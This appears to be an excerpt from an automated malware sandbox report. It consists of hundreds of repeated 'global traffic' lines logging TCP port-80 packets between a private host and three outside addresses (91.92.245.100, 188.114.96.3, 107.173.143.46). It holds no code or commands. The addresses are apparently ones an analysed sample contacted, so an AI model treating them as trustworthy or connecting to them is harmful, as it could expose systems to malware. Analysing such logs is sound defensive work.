            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
